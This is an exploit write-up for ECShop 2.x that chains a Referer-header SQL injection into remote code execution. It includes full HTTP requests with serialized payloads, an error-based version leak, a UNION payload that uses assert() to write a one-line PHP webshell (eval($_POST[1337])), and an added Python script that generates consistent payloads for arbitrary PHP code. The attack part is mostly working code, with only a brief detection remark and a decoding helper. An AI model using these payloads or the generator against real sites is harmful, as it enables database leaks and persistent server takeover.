ECShop 2.x SQL injection & code execution

指尖安全-小胖, 4 September 2018

SQL injection

`user.php?act=login` echoes the `Referer` header into the login template, and ECShop's template engine splits the rendered output on its hard-coded hash `554fcae493e564ee0dc75bdf2ebf94ca` (the value is version-specific; this one is 2.x's). Whatever follows the hash is treated as `<module>|<serialized array>`, passed through `unserialize()`, and handed to `insert_<module>()`. A Referer of `<hash>ads|a:2:{...}` therefore reaches `insert_ads()`, which concatenates the array's `num` and `id` straight into the `ecs_ad` query. The error report below shows where each lands: `num` after `LIMIT`, `id` inside `a.position_id = '...'`. `num` has to be present and different from `1`, otherwise `insert_ads()` takes a cached query that ignores it, which is why the payload starts with `0,1`.

Because ECShop prints both the failed query and MySQL's message, `extractvalue()` with an invalid XPath leaks `version()` (`5.5.53`) in one request. The serialized lengths (`s:72:`, `s:3:`) must match the payload byte for byte, or `unserialize()` returns false and nothing happens. On MySQL 8.0 `PROCEDURE ANALYSE()` no longer exists, so the `LIMIT` trick shown here does not work there; the `id` value is also unescaped and sits inside the WHERE clause. For detection, the request itself is the signature: no legitimate Referer contains the template hash followed by `|a:`.


Request

GET /ecshop//user.php?act=login HTTP/1.1
Host: 10.13.1.30
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=d771e6eaef7507e6acc3e43205dde277f8041f12; ECS[visit_times]=1
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Date: Tue, 04 Sep 2018 08:55:56 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.2.17
X-Powered-By: PHP/5.2.17
Cache-control: private
Content-Length: 768
Connection: close
Content-Type: text/html; charset=utf-8

MySQL server error report:Array
(
    [0] => Array
        (
            [message] => MySQL Query Error
        )

    [1] => Array
        (
            [sql] => SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND() AS rnd FROM `ecshop`.`ecs_ad` AS a LEFT JOIN `ecshop`.`ecs_ad_position` AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time <= '1536022557' AND end_time >= '1536022557' AND a.position_id = '1' ORDER BY rnd LIMIT 0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -
        )

    [2] => Array
        (
            [error] => XPATH syntax error: '~5.5.53'
        )

    [3] => Array
        (
            [errno] => 1105
        )

)

Code execution

The second request goes through the same `insert_ads()` path but turns the `ecs_ad` query into a UNION that returns a row under the attacker's control. `id` is `'/*`, which closes the quoted `position_id` value and opens a comment; `num` starts with `*/`, so `ORDER BY rnd LIMIT` is commented out and the `union select` that follows supplies all ten columns of the query. Column 2 (`position_id`) is `0x272f2a`, the hex of `'/*`, so the returned row matches the `id` that `insert_ads()` compares it against; column 9 (`position_style`) is the hex of

{$asd'];assert(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp'));//}xxx

which the template engine compiles as an inline (`str:`) template and evaluates (see the ringk3y write-up under References for the full code path). The base64 decodes to `file_put_contents('1.php','<?php eval($_POST[1337]); ?>')`, so one successful request drops a one-line webshell next to `user.php`:

http://10.13.1.30/ecshop/1.php (password 1337)

Two conditions apply: `assert()` evaluates a string argument only on PHP 5 and, when `zend.assertions` allows it, PHP 7 (the target here runs PHP 5.2.17; PHP 8 removed that behaviour), and the web server account must be able to write to the ECShop directory for `file_put_contents()` to succeed.

Request

GET /ecshop//user.php?act=login HTTP/1.1
Host: 10.13.1.30
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: ECS_ID=d771e6eaef7507e6acc3e43205dde277f8041f12; ECS[visit_times]=1
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}
Connection: close
Upgrade-Insecure-Requests: 1
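As an added example (not code from the original post or from ECShop), the Python below rebuilds both Referer values on this page from their parts and decodes them again, which is the check worth running before sending a hand-edited payload, since `unserialize()` rejects an array whose `s:N:` lengths no longer match. It takes the 2.x hash prefix, the `ads` module name and the ten-column layout from the requests and error report above; everything else, including the function names `build_referer`, `rce_referer` and `decode_referer`, is this example's own. `decode_referer` also doubles as a log-review helper: it returns `None` for any Referer that does not carry the hash.

```python
"""Build and decode the ECShop 2.x Referer payloads from this page.

Added example, not code from the original post or from ECShop. Assumptions
(also marked below): ECHASH is the 2.x template-engine hash as it appears in
the page's requests; the 10-column layout with position_id in column 2 and
position_style in column 9 is read off the SELECT in the error report.
"""
import base64
import binascii
import re

# Hash prefix the template engine splits on (copied from the page's Referer).
ECHASH = "554fcae493e564ee0dc75bdf2ebf94ca"


def php_serialize(value):
    """PHP serialize() for the int/str/dict subset the payloads use.

    Lengths are byte lengths; a wrong length makes unserialize() fail silently,
    which is the usual reason a hand-edited payload does nothing.
    """
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type: %r" % type(value))


def build_referer(params, mod="ads"):
    """<echash><module>|<serialized array>, which ends up as insert_<module>(params)."""
    return ECHASH + mod + "|" + php_serialize(params)


def sqli_referer(expr="version()"):
    """Error-based payload in the LIMIT clause (first request on the page)."""
    num = "0,1 procedure analyse(extractvalue(rand(),concat(0x7e,%s)),1)-- -" % expr
    return build_referer({"num": num, "id": 1})


def rce_referer(php_code, columns=10, id_col=2, style_col=9, marker="'/*"):
    """UNION payload that returns one attacker row (second request on the page).

    id closes the quoted position_id and opens a comment; num starts with */ so
    ORDER BY ... LIMIT is swallowed. id_col repeats the marker so the row passes
    insert_ads()'s position_id check; style_col is the hex of the template
    string that the engine compiles and runs.
    """
    b64 = base64.b64encode(php_code.encode()).decode()
    template = "{$asd'];assert(base64_decode('%s'));//}xxx" % b64
    cols = [str(i) for i in range(1, columns + 1)]
    cols[id_col - 1] = "0x" + marker.encode().hex()
    cols[style_col - 1] = "0x" + template.encode().hex()
    return build_referer({"num": "*/ union select %s-- -" % ",".join(cols), "id": marker})


_SER_STR = re.compile(r's:(\d+):"')


def decode_referer(value):
    """Reverse the encoding for log review: (module, {key: value}) or None.

    Handles the flat a:N:{...} of int/ASCII-string members these payloads use,
    honouring the declared lengths so quotes and ;} inside values survive.
    """
    if not value.startswith(ECHASH) or "|" not in value:
        return None
    mod, ser = value[len(ECHASH):].split("|", 1)
    m = re.match(r"a:(\d+):\{", ser)
    if not m:
        return None
    pos, items = m.end(), []
    try:
        while len(items) < 2 * int(m.group(1)):
            if ser.startswith("i:", pos):
                end = ser.index(";", pos)
                items.append(int(ser[pos + 2:end]))
                pos = end + 1
            else:
                sm = _SER_STR.match(ser, pos)
                if not sm:
                    return None
                n = int(sm.group(1))
                items.append(ser[sm.end():sm.end() + n])
                pos = sm.end() + n + 2  # step over the closing quote and ;
    except ValueError:
        return None
    return mod, dict(zip(items[0::2], items[1::2]))


def extract_php(num):
    """Recover the PHP that assert() would run from a UNION payload's hex column."""
    for h in re.findall(r"0x([0-9a-fA-F]+)", num):
        if len(h) % 2:
            continue
        s = binascii.unhexlify(h).decode("latin-1")
        b = re.search(r"base64_decode\('([A-Za-z0-9+/=]+)'\)", s)
        if b:
            return base64.b64decode(b.group(1)).decode()
    return None


if __name__ == "__main__":
    shell = "file_put_contents('1.php','<?php eval($_POST[1337]); ?>')"
    for ref in (sqli_referer(), rce_referer(shell)):
        mod, params = decode_referer(ref)
        print(ref[:60] + "...", "->", mod, sorted(params))
    print(extract_php(decode_referer(rce_referer(shell))[1]["num"]))
```

`rce_referer` reproduces the page's second Referer exactly, including the `s:280:` length, from nothing more than the PHP line the base64 encodes; swapping in a different `php_code` or column layout regenerates a consistent payload without hand-counting.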

References

http://ringk3y.com/2018/08/31/ecshop2-x%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/